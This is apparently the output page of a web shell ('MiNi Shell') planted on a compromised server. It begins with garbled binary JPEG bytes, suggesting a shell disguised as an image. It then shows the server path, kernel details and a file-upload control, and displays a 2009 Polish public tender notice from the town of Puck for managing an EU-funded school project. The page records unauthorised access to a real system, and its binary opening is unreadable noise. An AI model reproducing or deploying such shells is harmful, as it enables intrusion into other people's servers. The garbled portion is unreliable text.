JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090714/238086-N-2009.html

<p class="kh_header"><b>Puck: Zarządzanie projektem pn.: Młodzi mieszkańcy Pucka-bez barier szkolnych</b><br>
<b>Numer ogłoszenia: 238086 - 2009; data zamieszczenia: 14.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Puck , ul. 1 Maja 13, 84-100 Puck, woj. pomorskie, tel. 058 6730500, 6730534, faks 058 6730533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.puck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie projektem pn.: Młodzi mieszkańcy Pucka-bez barier szkolnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zarządzanie projektem pn.: Młodzi mieszkańcy Pucka-bez barier szkolnych.
Zadanie 1:Pełnienie funkcji Koordynatora Projektu.
Zadanie 2:Pełnienie funkcji Specjalisty ds. Wdrażania Projektu.
Zadania Koordynatora Projektu:
Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu. Wykonawca zobowiązany jest do realizacji zadań zapewniających wykonaie projektu w tym:
-nadzoru nad całością prac związanych z realizają projektu i ich jakością, nad personelem projektu,
-bieżącego  kontaktu z Instytucją Pośredniczącą i innymi organizacjami lub instytucjami zaangażowanymi bezpośrednio lub pośrednio przy realizacji projektu,
-nawiązania współpracy i nadzoru nad pracą wykonawców zadań, zakup sprzętu, materiałów dydaktycznych,
-dobór personelu projektowego,
-zatwierdzenie płatności w zakresie merytorycznym,
-odbiór wykonywanej pracy przez personel projektowy,
-zapewnienia terminowej realizacji zadań wynikających z harmonogramu realizacji projektu, sprawowania całościowego nadzoru nad realizacją projektu,
-zarządzania planowanymi działaniami projektowymi,
-prowadzenia dokumentacji projektowej w oparciu o obowiazujące zapisy,
-organizacji i monitoringu zadań wynikających z wniosku i harmonogramu projektu,
-organizacji dodatkowych elementów związanych z realizacją zajęć przewidzianych w ramach projektu,
-nadzoru nad bieżącą dokumentacją projektu,
-dokonywania systematycznej kontroli pracy i uzyskanych efektów,
-wprowadzania zmian do projektu w oparciu o obowiązujące zapisy zawarte w dokumentacji konkursowej, umowie o dofinansowanie projektu, dokumentach programowych Programu Operacyjnego Kapitał Ludzki,
-reprezentowania projektu na zewnątrz,
-akceptacji wniosków o łatność,
-kontroli i nadzoru nad monitoringiem realizacji projektu oraz sprawozdawczością (kontrola terminów) w oparciu o obowiązujące zpisy w dokumentach programowych Programu Operacyjnego Kapitał Ludzki.
Zadania Specjalisty ds. Wdrażania Projektu:
Realizacja zadań obejmuje udział w zadaniach związanych z wdrażaniem projektu zgodnie  z harmonogramem realizacji projektu. Wykonawca zobowiązany jst do realizacji zadań zapewniających wykonanie projektu w tym:
-przygotowania organizacyjnego zajęć,
-dobór nauczycieli i nadzór nad ich pracą,
-nadzoru nad opracowaniem wniosków o płatność,
-organizacji i realizacji działań informacyjno-promocyjnych projektu,
-dystrybucja materiałów promocyjnych,
-administracja podstrony internetowej projektu,
-zapewnienia terminowości realizowanych zadań,
-organizacja wycieczek dla beneficjentów,
-prowadzenie dikumentacji projektowej w oparciu o obowiązujące zapisy,
-nadzór nad biżącą dokumntacją i zarządzaniem budżetem.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)posiadają upawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w tym:
a)wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postepowania o udzielenie zamoweinia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, co najmniej dwie usługi, z czego minimum jedną związaną z realizacją pojektu z zakresu edukacji dzieci i młodzieży, realizowane przez jednostkę/jednostki samorzadu terytorialnego, współfinansowane przez Unię Europejską z Europejskiego Funduszu Spolecznego,  w ramach Programu Operacyjnego Kapitał Ludzki, w tym minimum w jednym projkcie o wartości co najmniej 400.000,-zł.
b)odpowiednio dysponują lub będzie im udostepniony sprzęt komputerowy z oprogrmowaniem, niezbędnym do wykonywania powierzonych zadań, w ilości po 1 szt. na każdą część zamowienia,
c)dysponują lub będą im udostępnione osoby do wykonania zamówienia posiadające nastepujące kwalifikacje, doświadczenie i wyksztalcenie:
KOORDYNATOR PROJEKTU (1 osoba):
-posiada znajomość obsługi pakietu MS OFFICE, Internetu oraz generatora wniosków PO KL.,
-uczestniczył w realizacji minimum 2 projektów współfinasowanych przez Unię Europejską z Europejskiego Fundszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, z zakresu edukacji dzieci i młodzieży na stanowisku kierownika projektu/zastepcy kierownika projeku, koordynatora projektu/zstepcy koordynatora projektu lub specjalisty, realizowanych przez jednostę/ki samorządu terytorialnego,
-pełnił funkcję kierownika projektu/zastępcy kierownika projektu, koordynatora projektu/zastępcy koordynatora projektu w minimum jednym projekcie z zakresu edukacji dzieci i mlodzieży realizowanym przez jednostkę samorzadu terytorialnego o wartości co najmniej 500.000,-zł. w ramach Programu Operacyjnego Kapitał Ludzki,
-posiada wyższe wyksztalcenie.  
SPECJALISTA DS. WDRAŻANIA PROJEKTU (1 osoba):
-posiada znajomośc obslugi pakietu MS OFFICE, Internetu w tym administrowania strony internetowej oraz generatora wniosków PO KL.,
-uczestniczył w realizacji minimum 2 projektów współfinansowanych przez Unię Europejską z Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, z czego minimum w jednym z zakresu edukacji dzieci i młodzieży, na stanowisku kierownika projektu/zastepcy kierownika projektu, kordynatora projektu/zastepcy koordynatora projektu lub specjalisty, realizowanych przez jednostkę/ki samorzadu terytorialnego,
-pełnił funkcję kierownika projektu/zastepcy kierownika projektu, koordynatora projektu/zastepcy koordynatora projektu lub specjalisty  w minimum jednym projekcie z zakresu edukacji dzieci i młodzieży realizowanym przez jednostkę samorządu terytorialnego o wartości co najmniej 400.000,-zł. w ramach Programu Operacyjnego Kapitał Ludzki,
-posiada wyższe wyksztacenie.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)Oświadczenia o spełnianiu warunków udziału w postepowaniu zgodne z treścią załączników 2 i 3 do specyfikacji istotnych warunków zamówienia,
2)aktualny odpis z własciwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesiecy przed upływem terminu składania ofert-nie dotyczy osób fizycznych nieprowadzacych działalnosci gospodarczej,
3)zgodny z treścią załącznika nr 4 do specyfiakcji istonych warunków zamówienia wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postepowania o udzielenie zamwienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie,
4)zgodny z treścią załącznika nr 5 do specyfiakcji istotnych warunków zamówienia wykaz osób, ktorymi dysponuje lub będzie dysponował wykonawca i które bedą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wyksztalcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
5)pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 4, wykonawca wskazał osoby, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.miasto.puck.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Puck, ul. 1 Maja 13, 84-100 Puck.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 09:00, miejsce: Urząd Miasta Puck, ul. 1 Maja 13, 84-100 Puck, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn:Modzi mieszkańcy Pucka-bez barier szkolnych jest dofinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wyksztalcenia i kompetencji w regionach, Poddziałanie 9.1.2. -  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji Koordynatora Projektu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadania Koordynatora Projektu: kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji Specjalisty ds. Wdrażania Projektu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadania Specjalisty ds. Wdrażania Projektu; realizacja zadań obejmuje udział w zdaniach związanych z wdrażaniem projektu zgodnie z harmonogramem realizacji projektu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com